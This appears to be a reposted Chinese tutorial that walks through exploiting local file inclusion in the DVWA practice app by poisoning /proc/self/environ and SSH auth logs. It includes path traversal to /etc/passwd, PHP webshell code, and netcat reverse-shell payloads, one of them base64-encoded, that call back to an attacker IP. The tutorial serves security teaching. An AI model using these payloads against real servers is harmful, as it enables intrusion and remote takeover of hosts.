| |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
-> 网络协议 -> 文件包含之日志中毒(User-Agent) -> 正文阅读 |
|
[网络协议]文件包含之日志中毒(User-Agent) |
目录 一、本地文件包含本地文件包含漏洞指的是包含本地的php文件,而通过PHP文件包含漏洞入侵网站,可以浏览同服务器所有文件,并获得webshell。 看见?page=标志性注入点,提示我们输入?=page=index.php 通过报错,我们可以知道当前文件包含的目录路径是/var/www/dvwa/vulnerabilities/fi/ 我们可以通过../../../../../etc/passwd 试一下能不能显示默认用户账户密码 发现可以访问。所以存在本地文件包含漏洞(LFI),你可以通过这种方法访问一些密码、敏感信息文件。 二、日志中毒如何利用LFI漏洞获得反弹shell,完全控制目标主机? 通过注入恶意代码到可读的文件中,然后浏览它使恶意代码被执行,比如 /proc/self/environ /var/log/auth.log /var/log/apache2/access.log 通常使用日志文件完成,因为本地文件通常会注册或写入日志文件。 举个栗子: 打开burpsuite,开启代理。浏览器访问下面url抓取http包 http://192.168.164.129/dvwa/vulnerabilities/fi/?page=../../../../../proc/self/environ 发现会执行代理,那我们把包修改为php代码后转发试试。? 修改完成,转发试试结果:? 可以发现php代码被执行了。所以我们就可以将payload换成webshell.php中的php代码从而获得webshell。 比如注入一句话木马
然后通过蚁剑连接。 获取反弹shell获得目标服务器的完全控制权方法一:本次换个方式,从文件上传那篇知道passthru("")函数是PHP执行系统命令的,这里使用netcat执行监听端口命令 构造payload为 <?passthru("nc -e /bin/sh 192.168.164.128 8888");?> 然后在kali上开启监听。 Forward改好的包结果如下: 成功控制目标主机。? 方法二:/var/log/auth.log访问日志文件 发现22端口是开启的,我们可以尝试用ssh登入看是否会被记录在日志文件中? 以random账户登入,随便输给密码。然后刷新浏览器页面找到random,发现已经记录到了日志文件。? 这说明,ssh后面的命令执行了,我们只要把命令替换成反弹shell的payload就ok了。 构造payload为 <?php passthru('nc -e /bin/sh 192.168.164.128 8888');?> 或执行命令 <?php system($_GET['a']);?> 开启监听,同时ssh登入。 这里命令需要进行base64编码,编码结果如下:? <?php passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxNzIuMTYuMTIuMTM3IDQ0NDQ='));?> 最后ssh回车车,刷新浏览器页面,执行注入命令反弹shell连接攻击主机。? 成功控制目标主机。? |
|
网络协议 最新文章 |
使用Easyswoole 搭建简单的Websoket服务 |
常见的数据通信方式有哪些? |
Openssl 1024bit RSA算法---公私钥获取和处 |
HTTPS协议的密钥交换流程 |
《小白WEB安全入门》03. 漏洞篇 |
HttpRunner4.x 安装与使用 |
2021-07-04 |
手写RPC学习笔记 |
K8S高可用版本部署 |
mySQL计算IP地址范围 |
|
上一篇文章 下一篇文章 查看所有文章 |
|
开发:
C++知识库
Java知识库
JavaScript
Python
PHP知识库
人工智能
区块链
大数据
移动开发
嵌入式
开发工具
数据结构与算法
开发测试
游戏开发
网络协议
系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程 数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁 |
360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年12日历 | -2024/12/28 20:52:53- |
|
网站联系: qq:121756557 email:121756557@qq.com IT数码 |
数据统计 |